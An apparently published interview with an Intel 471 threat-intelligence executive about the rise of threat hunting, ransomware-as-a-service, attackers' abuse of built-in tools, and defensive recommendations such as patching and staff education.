Why threat hunting is more vital than ever [Q&A]

The threat landscape is rapidly changing and businesses can no longer simply wait for an attack to be caught by traditional tools or decide how to respond after it occurs.

Mike Mitchell, VP of threat intelligence at Intel 471, has experienced the evolution of threat hunting first-hand as he's been in the industry for decades. We spoke to him to learn more.

BN: How have you seen threat hunting evolve in the last decade?

MM: The start of threat hunting in the cybersecurity industry looked like threat intelligence when it first came on the scene; threat hunting was a niche concept that only Fortune 100 companies could afford. Due to the complexity of implementation, cost and talent acquisition, threat hunting was often outsourced to managed service providers (MSPs) and services companies. This trend is shifting back towards organization ownership of their logging, data and threat hunting resources as threat hunting is an integral part of organizations’ cybersecurity team. This growth is evident by the increasing demand for threat hunters in the job market. For example, based on Intel 471's observations, five years ago, there were about 300 to 500 open positions for threat hunters and today, that number has grown to approximately 3,000 to 4,000 job openings. This surge in growth shows that organizations understand the importance of threat hunting and are looking to invest in it. Threat hunting’s effectiveness and efficiencies will continue to advance with the use of artificial intelligence (AI), but there will always need to be the human element in order for threat hunting to be successful.

BN: Why has threat hunting become a critical step in preventing cyber threats today? What challenges in the past may have prevented organizations from investing in threat hunting?

MM: Organizations can no longer afford to wait and hope their traditional security tools catch today’s sophisticated threats; they need a proactive approach that addresses them earlier and more often. While organizations are rapidly maturing their security postures, threat actors are maturing at the same rate, and companies need to invest in threat hunting to catch threats earlier in the attack chain phase.

The industry went from defending against advanced persistent threats (APTs) that targeted legacy systems to today’s living off-the-land binaries (LoLbins), which are now much more popular among threat actors due their ability to blend into normal activity and evade traditional security measures. These types of threats leverage systems and processes to 'hide in plain sight,' making them difficult to detect with traditional security tools. Therefore, these attacks become nearly impossible to catch.

As organizations continue to adapt their security measures, business leaders must understand that in order to have a robust security program, they must include threat hunting and a highly skilled team of threat hunters. I firmly believe it is not just about the tools that make threat-hunting successful for an organization but also the people who apply them.

BN: What are the top tactics, techniques, and procedures (TTPs) that threat actors often share today?

MM: We are seeing ransomware groups share information more than ever before and exhibit similar behaviors across the board. This makes it easier for any threat actor to enhance their skills and launch attacks. We observe documentation, new insights on what works and what doesn't and, more recently, ransomware groups establishing ransomware-as-a-service (RaaS) all in the cybercriminal underground. RaaS is a new business model for ransomware groups, where the groups set up infrastructure for a threat actor who doesn’t necessarily have the same level of capabilities or resources to carry out an attack to the same extent as a full group, increasing the frequency of ransomware attacks across all industries.

Threat actors are constantly sharing TTPs -- one example is once they're in a company's network environment, they look for tools already available to leverage, like Remote Management and Monitoring tools (RMM). By leveraging these tools, adversaries can laterally move, gain administrative access, apply scripts and code, all through the already available software and tools on an organization's network.

BN: What are the key components of a proactive, behavior-based approach to threat hunting?

MM: The first step to a proactive, behavior-based approach to threat hunting starts with intelligence. An organization needs to know what is at risk and identify its 'crown jewels' within its environment. This gives security leaders a prioritization plan that threat hunters can focus on, empowering them to be proactive and protect the organization's most valuable assets.

Because of the recent increase in information sharing among threat actors, organizations need to be aware that they could be attacked by threat groups that typically don't go after their specific industry. Opportunistic threat actors and adversaries look for any available vulnerable systems to gain initial access and take advantage of them.

To prevent this from happening, organizations need comprehensive visibility of their environment and data from threat intelligence teams to hunt successfully. Communication is also a huge element of a successful threat hunting approach -- teams must talk to each other. The intelligence team needs to talk to the threat hunting team; the incident response team needs to be involved, as well as the security operations center (SOC) team, to ensure threat hunting is successful across the organization.

BN: Which ransomware groups are at the top of your radar this year, and what are three ways organizations can defend themselves against attacks?

MM: The ransomware groups that remain at the top of our radar this year include RansomwareHub, Lockbit and ALPHV. They share similar behaviors and are targeting industries that can have serious and long-term ramifications, such as financial institutions, retail and industrial control systems.

Here are my top recommendations for best practices all organizations can do to defend themselves:

• Vulnerability and patch management: Attackers are going to leverage vulnerabilities, so organizations need to be aware of their exposure and manage them effectively to prevent attacks.
• Education and a shared mission for security: The traditional methods of leveraging human error through phishing campaigns, impersonation, spoofing, etc., will continue to happen, which is why leaders and security teams need to educate the entire organization on basic security practices and real-world use cases. Ultimately, when teams across an organization share a mission for security, they can enhance their overall security posture.
• Evaluate how tools are managed: Even an organization with the 'best' security tools are at risk if they are not aware of how and where the tool is implemented and what visibility the tool provides. As organizations mature, rather than solely relying on tools, teams must take human action and own their data to prevent attacks successfully.

Image credit: Andrian Supyanda/Dreamstime.com